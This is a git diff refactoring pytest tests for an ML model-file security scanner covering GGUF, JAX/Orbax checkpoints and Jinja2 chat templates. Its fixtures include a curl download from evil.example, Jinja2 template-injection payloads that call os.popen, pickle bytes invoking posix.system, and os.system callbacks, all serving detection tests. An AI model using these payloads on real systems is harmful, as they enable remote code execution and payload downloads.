_failed_metadata_value_checks(result) - assert checks - assert any(check.details["evidence_type"] == "remote_fetch" for check in checks) - assert all(check.rule_code == "S902" for check in checks) + _assert_remote_fetch_alias(tmp_path, value, "capped-function-aliases.gguf") @pytest.mark.parametrize( @@ -2388,50 +2335,24 @@ def test_gguf_nested_metadata_array_strings_are_scanned_without_flagging_benign_ def test_gguf_tokenizer_vocabulary_array_strings_are_inert_metadata(tmp_path: Path) -> None: - path = tmp_path / "tokenizer-vocabulary-array.gguf" - _write_gguf_raw_metadata_entries( - path, - [ - ( - "tokenizer.ggml.tokens", - 9, - _encode_gguf_array( - 8, - _encode_gguf_string("curl https://evil.example/payload.sh") - + _encode_gguf_string("{{ ''.__class__.__mro__[1].__subclasses__() }}"), - 2, - ), - ) - ], + _assert_gguf_inert_tokenizer_array( + tmp_path, + ("tokenizer-vocabulary-array.gguf"), + ("tokenizer.ggml.tokens"), + ("curl https://evil.example/payload.sh"), + ("{{ ''.__class__.__mro__[1].__subclasses__() }}"), ) - result = GgufScanner().scan(str(path)) - - assert _failed_metadata_value_checks(result) == [] - def test_gguf_tokenizer_merges_array_strings_are_inert_metadata(tmp_path: Path) -> None: - path = tmp_path / "tokenizer-merges-array.gguf" - _write_gguf_raw_metadata_entries( - path, - [ - ( - "tokenizer.ggml.merges", - 9, - _encode_gguf_array( - 8, - _encode_gguf_string("../ordinary-tokenizer-merge") - + _encode_gguf_string("curl https://evil.example/payload.sh"), - 2, - ), - ) - ], + _assert_gguf_inert_tokenizer_array( + tmp_path, + ("tokenizer-merges-array.gguf"), + ("tokenizer.ggml.merges"), + ("../ordinary-tokenizer-merge"), + ("curl https://evil.example/payload.sh"), ) - result = GgufScanner().scan(str(path)) - - assert _failed_metadata_value_checks(result) == [] - @pytest.mark.parametrize("key", ["tokenizer.ggml.tokens.payload", "tokenizer.ggml.merges.payload"]) def test_gguf_tokenizer_inert_array_prefixed_metadata_is_scanned(tmp_path: Path, key: str) -> None: @@ -3526,3 +3447,55 @@ def test_gguf_ggml_ignores_stray_end_of_central_directory_bytes(tmp_path: Path, assert not any("Polyglot" in check.name for check in result.checks) assert not any(issue.rule_code == "S908" for issue in result.issues) + + +def _assert_gguf_inert_tokenizer_array( + tmp_path: Path, filename: str, metadata_key: str, first_value: str, second_value: str +) -> None: + path = tmp_path / filename + _write_gguf_raw_metadata_entries( + path, + [ + ( + metadata_key, + 9, + _encode_gguf_array( + 8, + _encode_gguf_string(first_value) + _encode_gguf_string(second_value), + 2, + ), + ) + ], + ) + + result = GgufScanner().scan(str(path)) + + assert _failed_metadata_value_checks(result) == [] + + +def _assert_gguf_benign_template(tmp_path: Path, filename: str, template: str) -> None: + path = create_mock_gguf( + tmp_path / filename, + metadata={ + "tokenizer.chat_template": template, + }, + ) + + result = GgufScanner().scan(str(path)) + + assert any(check.name == "Jinja2 SSTI Analysis" and check.status == CheckStatus.PASSED for check in result.checks) + assert not any( + check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED + for check in result.checks + ) + + +def _assert_remote_fetch_alias(tmp_path: Path, value: str, filename: str) -> None: + path = create_mock_gguf(tmp_path / filename, metadata={"callback": value}) + + result = GgufScanner().scan(str(path)) + + checks = _failed_metadata_value_checks(result) + assert checks + assert any(check.details["evidence_type"] == "remote_fetch" for check in checks) + assert all(check.rule_code == "S902" for check in checks) diff --git a/tests/scanners/test_jax_checkpoint_scanner.py b/tests/scanners/test_jax_checkpoint_scanner.py index 964f2a3ca..d16b3d529 100644 --- a/tests/scanners/test_jax_checkpoint_scanner.py +++ b/tests/scanners/test_jax_checkpoint_scanner.py @@ -8,7 +8,6 @@ import pytest -from modelaudit.cache import get_cache_manager, reset_cache_manager from modelaudit.core import determine_exit_code, scan_model_directory_or_file from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity from modelaudit.scanners.jax_checkpoint_scanner import JaxCheckpointScanner @@ -19,6 +18,10 @@ is_confirmed_jax_json_checkpoint_file, is_jax_json_checkpoint_file, ) +from tests.helpers.cache import assert_inconclusive_not_cached as _assert_file_inconclusive_not_cached +from tests.helpers.file_creators import ( + pickle_binunicode_text as _proto4_binunicode, +) def _write_orbax_metadata(checkpoint_dir: Path, metadata: dict[str, object]) -> None: @@ -32,47 +35,6 @@ def _proto4_short_unicode(value: str) -> bytes: return b"\x8c" + bytes([len(encoded)]) + encoded -def _proto4_binunicode(value: str) -> bytes: - encoded = value.encode("utf-8") - return b"X" + len(encoded).to_bytes(4, "little") + encoded - - -def _assert_file_inconclusive_not_cached( - path: Path, - expected_reason: str, - cache_dir: Path, - **scan_kwargs: Any, -) -> None: - reset_cache_manager() - try: - first = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) - second = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) - - for aggregate in (first, second): - metadata = aggregate.file_metadata[str(path)] - assert metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert expected_reason in metadata["scan_outcome_reasons"] - assert not [ - issue for issue in aggregate.issues if issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - ] - assert determine_exit_code(aggregate) == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 - finally: - reset_cache_manager() - - def test_orbax_metadata_regex_patterns_are_detected(tmp_path: Path) -> None: checkpoint_dir = tmp_path / "orbax_checkpoint" _write_orbax_metadata( @@ -801,27 +763,7 @@ def test_protocol_zero_jax_checkpoint_pickle_global_opcode_is_detected(tmp_path: def test_orbax_protocol_zero_checkpoint_without_jax_marker_scans_pickle(tmp_path: Path) -> None: - checkpoint_dir = tmp_path / "orbax_protocol0" - checkpoint_dir.mkdir() - checkpoint_file = checkpoint_dir / "checkpoint" - checkpoint_file.write_bytes(b"cposix\nsystem\np0\n(Vid\np1\ntp2\nRp3\n.") - - assert JaxCheckpointScanner.can_handle(str(checkpoint_dir)) - - result = JaxCheckpointScanner().scan(str(checkpoint_dir)) - - assert result.success - assert not any( - check.name == "Checkpoint Format Detection" and check.details.get("format") == "unknown" - for check in result.checks - ) - assert any( - check.name == "Pickle Opcode Security Check" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details["global"] == "posix.system" - for check in result.checks - ) + _assert_orbax_checkpoint_pickle(tmp_path, ("orbax_protocol0"), (b"cposix\nsystem\np0\n(Vid\np1\ntp2\nRp3\n.")) def test_orbax_protocol_one_checkpoint_without_jax_marker_scans_pickle(tmp_path: Path) -> None: @@ -994,26 +936,8 @@ def test_orbax_legacy_pickle_dangerous_global_after_probe_boundary_is_detected(t def test_orbax_protocol_zero_persid_checkpoint_scans_pickle(tmp_path: Path) -> None: - checkpoint_dir = tmp_path / "orbax_persid" - checkpoint_dir.mkdir() - checkpoint_file = checkpoint_dir / "checkpoint" - checkpoint_file.write_bytes(b"Popaque_id\ncposix\nsystem\np0\n(Vid\np1\ntp2\nRp3\n.") - - assert JaxCheckpointScanner.can_handle(str(checkpoint_dir)) - - result = JaxCheckpointScanner().scan(str(checkpoint_dir)) - - assert result.success - assert not any( - check.name == "Checkpoint Format Detection" and check.details.get("format") == "unknown" - for check in result.checks - ) - assert any( - check.name == "Pickle Opcode Security Check" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details["global"] == "posix.system" - for check in result.checks + _assert_orbax_checkpoint_pickle( + tmp_path, ("orbax_persid"), (b"Popaque_id\ncposix\nsystem\np0\n(Vid\np1\ntp2\nRp3\n.") ) @@ -1892,36 +1816,19 @@ def test_oversized_jax_json_checkpoint_decodes_pattern_in_truncated_string_value def test_oversized_jax_json_checkpoint_decodes_truncated_documentation_before_suppression(tmp_path: Path) -> None: checkpoint_path = tmp_path / "escaped-long-documentation.checkpoint" - checkpoint_path.write_text( + _assert_bounded_jax_documentation( + checkpoint_path, '{"framework":"jax","description":"caf\\u00e9 Documentation mentions ' - "jax.experimental.io_callback as unsupported. " - + ("x" * (JAX_JSON_CHECKPOINT_STRUCTURE_READ_BYTES + 16)) - + '"}', - encoding="utf-8", + "jax.experimental.io_callback as unsupported. ", ) - result = JaxCheckpointScanner().scan(str(checkpoint_path)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - assert all(check.name != "JSON Pattern Security Check" for check in result.checks) - def test_oversized_jax_json_checkpoint_does_not_scan_trailing_second_root(tmp_path: Path) -> None: checkpoint_path = tmp_path / "trailing-document-large.checkpoint" - checkpoint_path.write_text( - '{"framework":"jax"}{"payload":"jax.experimental.io_callback","padding":"' - + ("x" * (JAX_JSON_CHECKPOINT_STRUCTURE_READ_BYTES + 16)) - + '"}', - encoding="utf-8", + _assert_bounded_jax_documentation( + checkpoint_path, '{"framework":"jax"}{"payload":"jax.experimental.io_callback","padding":"' ) - result = JaxCheckpointScanner().scan(str(checkpoint_path)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - assert all(check.name != "JSON Pattern Security Check" for check in result.checks) - def test_oversized_jax_json_checkpoint_scans_visible_first_root_before_trailing_bytes(tmp_path: Path) -> None: checkpoint_path = tmp_path / "visible-malicious-root-with-trailing-bytes.checkpoint" @@ -2793,57 +2700,20 @@ def fail_json_load(_stream: Any) -> Any: def test_oversized_orbax_metadata_reports_visible_bounded_pattern(tmp_path: Path) -> None: checkpoint_dir = tmp_path / "oversized_orbax_visible" - checkpoint_dir.mkdir() - (checkpoint_dir / "metadata.json").write_text( - json.dumps( - { - "type": "orbax_checkpoint", - "payload": "jax.experimental.host_callback.call(os.system, 'id')", - "padding": "x" * (JAX_JSON_CHECKPOINT_STRUCTURE_READ_BYTES + 16), - } - ), - encoding="utf-8", - ) - - result = JaxCheckpointScanner().scan(str(checkpoint_dir)) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert "jax_orbax_metadata_analysis_size_limit" in result.metadata["scan_outcome_reasons"] - assert any( - check.name == "Orbax Pattern Security Check" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details["context"] == "orbax_metadata_bounded_prefix.payload" - for check in result.checks + _assert_bounded_orbax_pattern( + checkpoint_dir, + "payload", + "jax.experimental.host_callback.call(os.system, 'id')", + "Orbax Pattern Security Check", + "orbax_metadata_bounded_prefix.payload", + "context", ) def test_oversized_orbax_metadata_reports_visible_dangerous_restore_fn(tmp_path: Path) -> None: checkpoint_dir = tmp_path / "oversized_orbax_restore_fn" - checkpoint_dir.mkdir() - (checkpoint_dir / "metadata.json").write_text( - json.dumps( - { - "type": "orbax_checkpoint", - "restore_fn": "os.system", - "padding": "x" * (JAX_JSON_CHECKPOINT_STRUCTURE_READ_BYTES + 16), - } - ), - encoding="utf-8", - ) - - result = JaxCheckpointScanner().scan(str(checkpoint_dir)) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert "jax_orbax_metadata_analysis_size_limit" in result.metadata["scan_outcome_reasons"] - assert any( - check.name == "Orbax Restore Function Check" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details["restore_fn"] == "os.system" - for check in result.checks + _assert_bounded_orbax_pattern( + checkpoint_dir, "restore_fn", "os.system", "Orbax Restore Function Check", "os.system", "restore_fn" ) @@ -2942,3 +2812,69 @@ def test_orbax_numeric_numpy_checkpoint_remains_clean(tmp_path: Path) -> None: assert result.success is True assert result.metadata.get("scan_outcome") != "inconclusive" + + +def _assert_orbax_checkpoint_pickle(tmp_path: Path, directory_name: str, payload: bytes) -> None: + checkpoint_dir = tmp_path / directory_name + checkpoint_dir.mkdir() + checkpoint_file = checkpoint_dir / "checkpoint" + checkpoint_file.write_bytes(payload) + + assert JaxCheckpointScanner.can_handle(str(checkpoint_dir)) + + result = JaxCheckpointScanner().scan(str(checkpoint_dir)) + + assert result.success + assert not any( + check.name == "Checkpoint Format Detection" and check.details.get("format") == "unknown" + for check in result.checks + ) + assert any( + check.name == "Pickle Opcode Security Check" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + and check.details["global"] == "posix.system" + for check in result.checks + ) + + +def _assert_bounded_orbax_pattern( + checkpoint_dir: Path, metadata_key: str, metadata_value: str, check_name: str, detail_value: str, detail_key: str +) -> None: + checkpoint_dir.mkdir() + (checkpoint_dir / "metadata.json").write_text( + json.dumps( + { + "type": "orbax_checkpoint", + metadata_key: metadata_value, + "padding": "x" * (JAX_JSON_CHECKPOINT_STRUCTURE_READ_BYTES + 16), + } + ), + encoding="utf-8", + ) + + result = JaxCheckpointScanner().scan(str(checkpoint_dir)) + + assert result.success is False + assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME + assert "jax_orbax_metadata_analysis_size_limit" in result.metadata["scan_outcome_reasons"] + assert any( + check.name == check_name + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + and check.details[detail_key] == detail_value + for check in result.checks + ) + + +def _assert_bounded_jax_documentation(checkpoint_path: Path, prefix: str) -> None: + checkpoint_path.write_text( + prefix + ("x" * (JAX_JSON_CHECKPOINT_STRUCTURE_READ_BYTES + 16)) + '"}', + encoding="utf-8", + ) + + result = JaxCheckpointScanner().scan(str(checkpoint_path)) + + assert result.success is False + assert result.metadata["scan_outcome"] == "inconclusive" + assert all(check.name != "JSON Pattern Security Check" for check in result.checks) diff --git a/tests/scanners/test_jinja2_template_scanner.py b/tests/scanners/test_jinja2_template_scanner.py index 149786068..ba2558999 100644 --- a/tests/scanners/test_jinja2_template_scanner.py +++ b/tests/scanners/test_jinja2_template_scanner.py @@ -190,14 +190,7 @@ class TestJinja2TemplateScannerPatternCategories: def test_detects_critical_injection(self, tmp_path: Path) -> None: """Test detection of critical injection patterns.""" - template_file = tmp_path / "critical.jinja" - template_file.write_text("{{ lipsum.__globals__.os.popen('id').read() }}") - - scanner = Jinja2TemplateScanner() - result = scanner.scan(str(template_file)) - - failed_checks = [c for c in result.checks if c.status == CheckStatus.FAILED] - assert len(failed_checks) > 0 + _assert_critical_template(tmp_path, ("critical.jinja"), ("{{ lipsum.__globals__.os.popen('id').read() }}")) def test_detects_global_access(self, tmp_path: Path) -> None: """Test detection of global namespace access patterns.""" @@ -215,25 +208,13 @@ def test_detects_global_access(self, tmp_path: Path) -> None: def test_detects_builtins_access(self, tmp_path: Path) -> None: """Test detection of __builtins__ access patterns.""" - template_file = tmp_path / "builtins.jinja" - template_file.write_text("{{ config.__class__.__init__.__globals__.__builtins__ }}") - - scanner = Jinja2TemplateScanner() - result = scanner.scan(str(template_file)) - - failed_checks = [c for c in result.checks if c.status == CheckStatus.FAILED] - assert len(failed_checks) > 0 + _assert_critical_template( + tmp_path, ("builtins.jinja"), ("{{ config.__class__.__init__.__globals__.__builtins__ }}") + ) def test_detects_request_object_access(self, tmp_path: Path) -> None: """Test detection of request object access.""" - template_file = tmp_path / "request.jinja" - template_file.write_text("{{ request.application.__globals__.__builtins__ }}") - - scanner = Jinja2TemplateScanner() - result = scanner.scan(str(template_file)) - - failed_checks = [c for c in result.checks if c.status == CheckStatus.FAILED] - assert len(failed_checks) > 0 + _assert_critical_template(tmp_path, ("request.jinja"), ("{{ request.application.__globals__.__builtins__ }}")) class TestJinja2TemplateScannerFalsePositives: @@ -374,25 +355,8 @@ def test_active_requests_call_in_chat_template_is_still_critical(self, tmp_path: ) def test_active_requests_statement_in_chat_template_is_still_critical(self, tmp_path: Path) -> None: - tokenizer_file = tmp_path / "tokenizer_config.json" - tokenizer_file.write_text( - json.dumps( - { - "chat_template": ( - "{% set response = requests.post('https://example.test/payload') %}{{ response.status_code }}" - ) - } - ), - encoding="utf-8", - ) - - result = Jinja2TemplateScanner().scan(str(tokenizer_file)) - - assert any( - check.severity == IssueSeverity.CRITICAL - and check.details.get("pattern_type") == "critical_injection" - and check.details.get("match_text") == "requests." - for check in _jinja_detection_checks(result) + _assert_active_request_template( + tmp_path, ("{% set response = requests.post('https://example.test/payload') %}{{ response.status_code }}") ) def test_raw_and_comment_requests_are_not_executable_ssti(self, tmp_path: Path) -> None: @@ -439,20 +403,7 @@ def test_malformed_prose_requests_template_stays_clean(self, tmp_path: Path) -> assert _jinja_detection_checks(result) == [] def test_malformed_active_requests_expression_still_detected(self, tmp_path: Path) -> None: - tokenizer_file = tmp_path / "tokenizer_config.json" - tokenizer_file.write_text( - json.dumps({"chat_template": "{{ requests.get('https://example.test/payload')"}), - encoding="utf-8", - ) - - result = Jinja2TemplateScanner().scan(str(tokenizer_file)) - - assert any( - check.severity == IssueSeverity.CRITICAL - and check.details.get("pattern_type") == "critical_injection" - and check.details.get("match_text") == "requests." - for check in _jinja_detection_checks(result) - ) + _assert_active_request_template(tmp_path, ("{{ requests.get('https://example.test/payload')")) class TestJinja2TemplateScannerExecutableSpans: @@ -701,49 +652,11 @@ def test_malformed_json_raw_template_fallback_detects_ssti(self, tmp_path: Path) def test_malformed_large_json_raw_template_fallback_detects_ssti_in_prefix(self, tmp_path: Path) -> None: """Large malformed configs should scan bounded raw windows instead of bailing out.""" - tokenizer_file = tmp_path / "tokenizer_config.json" - payload = "{{ lipsum.__globals__.os.popen('id').read() }}" - tokenizer_file.write_text( - '{"chat_template":"' + ("a" * 70000) + payload + ("b" * 220000), - encoding="utf-8", - ) - - result = Jinja2TemplateScanner().scan(str(tokenizer_file)) - - assert result.metadata["scan_outcome"] == "inconclusive" - assert "jinja2_json_parse_failed" in result.metadata["scan_outcome_reasons"] - failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] - assert failed_checks - assert any(str(c.details.get("template_location")).startswith("raw_json_parse_fallback") for c in failed_checks) - - aggregate_result = scan_model_directory_or_file( - str(tokenizer_file), - config={"cache_scan_results": False}, - ) - assert determine_exit_code(aggregate_result) == 1 + _assert_malformed_json_ssti(tmp_path, (70000), (220000)) def test_malformed_large_json_raw_template_fallback_detects_ssti_after_prefix(self, tmp_path: Path) -> None: """Raw fallback should find template markers beyond the initial read window.""" - tokenizer_file = tmp_path / "tokenizer_config.json" - payload = "{{ lipsum.__globals__.os.popen('id').read() }}" - tokenizer_file.write_text( - '{"chat_template":"' + ("a" * 300000) + payload + ("b" * 70000), - encoding="utf-8", - ) - - result = Jinja2TemplateScanner().scan(str(tokenizer_file)) - - assert result.metadata["scan_outcome"] == "inconclusive" - assert "jinja2_json_parse_failed" in result.metadata["scan_outcome_reasons"] - failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] - assert failed_checks - assert any(str(c.details.get("template_location")).startswith("raw_json_parse_fallback") for c in failed_checks) - - aggregate_result = scan_model_directory_or_file( - str(tokenizer_file), - config={"cache_scan_results": False}, - ) - assert determine_exit_code(aggregate_result) == 1 + _assert_malformed_json_ssti(tmp_path, (300000), (70000)) def test_malformed_large_json_raw_template_fallback_ignores_clustered_benign_markers( self, @@ -1381,42 +1294,14 @@ def test_sandbox_budget_preserves_static_findings_and_security_exit(self, tmp_pa assert determine_exit_code(aggregate_result) == 1 def test_sandbox_budget_does_not_hide_static_sandbox_risk(self, tmp_path: Path) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "amplify-and-dunder.jinja" - template_file.write_text("{{ 'A' * 1000000 }}{{ messages.__class__ }}", encoding="utf-8") - - result = Jinja2TemplateScanner( - { - "sandbox_render_max_output_chars": 16, - "sandbox_render_timeout_seconds": 2, - } - ).scan(str(template_file)) - - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "budget_exceeded" - failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] - assert any(c.details.get("pattern_type") == "sandbox_violation" for c in failed_checks) + _assert_sandbox_risk_after_budget( + tmp_path, ("amplify-and-dunder.jinja"), ("{{ 'A' * 1000000 }}{{ messages.__class__ }}") + ) def test_sandbox_budget_does_not_hide_ast_sandbox_probe_risk(self, tmp_path: Path) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "amplify-and-private-attr.jinja" - template_file.write_text("{{ 'A' * 1000000 }}{{ value._private }}", encoding="utf-8") - - result = Jinja2TemplateScanner( - { - "sandbox_render_max_output_chars": 16, - "sandbox_render_timeout_seconds": 2, - } - ).scan(str(template_file)) - - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "budget_exceeded" - failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] - assert any(c.details.get("pattern_type") == "sandbox_violation" for c in failed_checks) + _assert_sandbox_risk_after_budget( + tmp_path, ("amplify-and-private-attr.jinja"), ("{{ 'A' * 1000000 }}{{ value._private }}") + ) def test_benign_template_below_sandbox_budget_remains_clean(self, tmp_path: Path) -> None: pytest.importorskip("jinja2.sandbox") @@ -1476,61 +1361,35 @@ def test_unavailable_sandbox_worker_keeps_benign_template_clean( "_test_template_safety_with_budget", lambda _template_content: ("worker_unavailable", "AssertionError"), ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + _assert_benign_sandbox_failure_clean(scanner, template_file) def test_unavailable_sandbox_worker_fails_closed_for_ast_sandbox_probe_risk( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "private-attr.jinja" - template_file.write_text("{{ value._private }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner() - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), + _assert_sandbox_unavailable( + tmp_path, + monkeypatch, + ("private-attr.jinja"), + ("{{ value._private }}"), + ("worker_unavailable"), + ("AssertionError"), ) - result = scanner.scan(str(template_file)) - - assert result.has_errors is True - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] - assert any(c.details.get("pattern_type") == "sandbox_violation" for c in failed_checks) def test_worker_error_before_result_preserves_ast_sandbox_probe_risk( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "private-attr-worker-error.jinja" - template_file.write_text("{{ value._private }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner() - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_error", "exitcode=1"), + _assert_sandbox_unavailable( + tmp_path, + monkeypatch, + ("private-attr-worker-error.jinja"), + ("{{ value._private }}"), + ("worker_error"), + ("exitcode=1"), ) - result = scanner.scan(str(template_file)) - - assert result.has_errors is True - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" - failed_checks = [c for c in result.checks if c.name == "Jinja2 Template Injection Detection"] - assert any(c.details.get("pattern_type") == "sandbox_violation" for c in failed_checks) def test_spawn_startup_timeout_keeps_benign_template_clean( self, @@ -1568,45 +1427,73 @@ def test_spawn_worker_exit_before_result_keeps_benign_template_clean( "_test_template_safety_with_budget", lambda _template_content: ("worker_error", "exitcode=1"), ) - result = scanner.scan(str(template_file)) - - assert result.success is True - assert "scan_outcome" not in result.metadata - assert not [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] + _assert_benign_sandbox_failure_clean(scanner, template_file) def test_unavailable_sandbox_worker_fails_closed_for_static_expression_range( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "range-expression.jinja" - template_file.write_text("{{ range(10 ** 8)|list }}", encoding="utf-8") - - scanner = Jinja2TemplateScanner() - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" + _assert_static_range_failure(tmp_path, monkeypatch, ("{{ range(10 ** 8)|list }}")) - def test_unavailable_sandbox_worker_uses_configured_budget_for_range_fallback( + @pytest.mark.parametrize( + ("filename", "template_content", "budget"), + [ + pytest.param( + "configured-range-expression.jinja", + "{{ range(1000)|list }}", + 16, + id="uses_configured_budget_for_range_fallback", + ), + pytest.param( + "range-loop.jinja", "{% for i in range(1000) %}{% endfor %}", 16, id="fails_closed_for_large_range_loop" + ), + pytest.param( + "range-slice-loop.jinja", + "{% for group in range(1000)|slice(10) %}{% endfor %}", + 16, + id="fails_closed_when_lazy_slice_is_iterated", + ), + pytest.param("range-join.jinja", "{{ range(1000)|join }}", 16, id="fails_closed_for_large_range_join"), + pytest.param( + "range-select-list.jinja", + "{{ range(1000)|select|list }}", + 16, + id="fails_closed_for_materialized_lazy_range_filter", + ), + pytest.param( + "rendered-range-expression.jinja", + "{{ range(300)|list }}", + 1000, + id="uses_rendered_size_for_range_list_fallback", + ), + pytest.param( + "amplify-list-literal.jinja", + "{{ ['ABCDEFGHIJKLMNOPQRST'] * 2 }}", + 16, + id="fails_closed_for_repeated_large_list_literal", + ), + pytest.param( + "amplify-dict-list-literal.jinja", + "{{ [{'long_key': 'long_value'}] * 50 }}", + 1000, + id="fails_closed_for_repeated_dict_list_literal", + ), + ], + ) + def test_unavailable_sandbox_worker_fails_closed_with_configured_budget( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, + filename: str, + template_content: str, + budget: int, ) -> None: pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "configured-range-expression.jinja" - template_file.write_text("{{ range(1000)|list }}", encoding="utf-8") + template_file = tmp_path / filename + template_file.write_text(template_content, encoding="utf-8") - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) + scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": budget}) monkeypatch.setattr( scanner, "_test_template_safety_with_budget", @@ -1634,23 +1521,7 @@ def test_unavailable_sandbox_worker_uses_configured_budget_for_range_aliases( monkeypatch: pytest.MonkeyPatch, template_content: str, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "configured-range-alias.jinja" - template_file.write_text(template_content, encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" + _assert_sandbox_range_budget(tmp_path, monkeypatch, template_content, ("configured-range-alias.jinja")) @pytest.mark.parametrize( "template_content", @@ -1858,34 +1729,69 @@ def test_unavailable_sandbox_worker_fails_closed_for_wrapped_scalar_range_filter monkeypatch: pytest.MonkeyPatch, template_content: str, ) -> None: - pytest.importorskip("jinja2.sandbox") - template_file = tmp_path / "wrapped-range-scalar-filter.jinja" - template_file.write_text(template_content, encoding="utf-8") - - scanner = Jinja2TemplateScanner({"sandbox_render_max_output_chars": 16}) - monkeypatch.setattr( - scanner, - "_test_template_safety_with_budget", - lambda _template_content: ("worker_unavailable", "AssertionError"), - ) - result = scanner.scan(str(template_file)) - - assert result.success is False - assert result.metadata["scan_outcome"] == "inconclusive" - budget_checks = [c for c in result.checks if c.name == "Template Sandbox Safety Probe"] - assert len(budget_checks) == 1 - assert budget_checks[0].details["budget_type"] == "worker_unavailable" + _assert_sandbox_range_budget(tmp_path, monkeypatch, template_content, ("wrapped-range-scalar-filter.jinja")) - def test_unavailable_sandbox_worker_keeps_direct_range_repr_clean( + @pytest.mark.parametrize( + ("filename", "template_content", "budget"), + [ + pytest.param( + "direct-range-expression.jinja", "{{ range(100000) }}", 16, id="keeps_direct_range_repr_clean" + ), + pytest.param( + "small-symbolic-range-delta.jinja", + "{{ range(10 ** 1000, (10 ** 1000 + 2) - 1) }}", + 65536, + id="keeps_small_symbolic_range_delta_clean", + ), + pytest.param( + "shadowed-range-macro.jinja", + "{% macro range(_count) %}12{% endmacro %}{{ range(100001)|min }}", + 16, + id="respects_shadowed_range_macro", + ), + pytest.param( + "overwritten-range-function.jinja", + "{% macro small(_count) %}12{% endmacro %}{% set reducer = range %}" + "{% set reducer = small %}{{ reducer(100001)|min }}", + 16, + id="respects_overwritten_range_function_alias", + ), + pytest.param( + "exact-power-quotient.jinja", + "{{ range((10 ** 101) // (10 ** 100))|list }}", + 1000, + id="keeps_exact_saturated_power_quotient_clean", + ), + pytest.param( + "large-offset-small-range.jinja", + "{{ range(10 ** 13, 10 ** 13 + 1)|list }}", + 64, + id="keeps_small_range_at_large_offset_clean", + ), + pytest.param( + "bounded-amplify.jinja", + "{{ 'A' * 10000 }}", + 65536, + id="respects_configured_budget_for_string_repetition", + ), + pytest.param( + "integer-multiplication.jinja", "{{ 100000 * 100000 }}", 16, id="keeps_integer_multiplication_clean" + ), + ], + 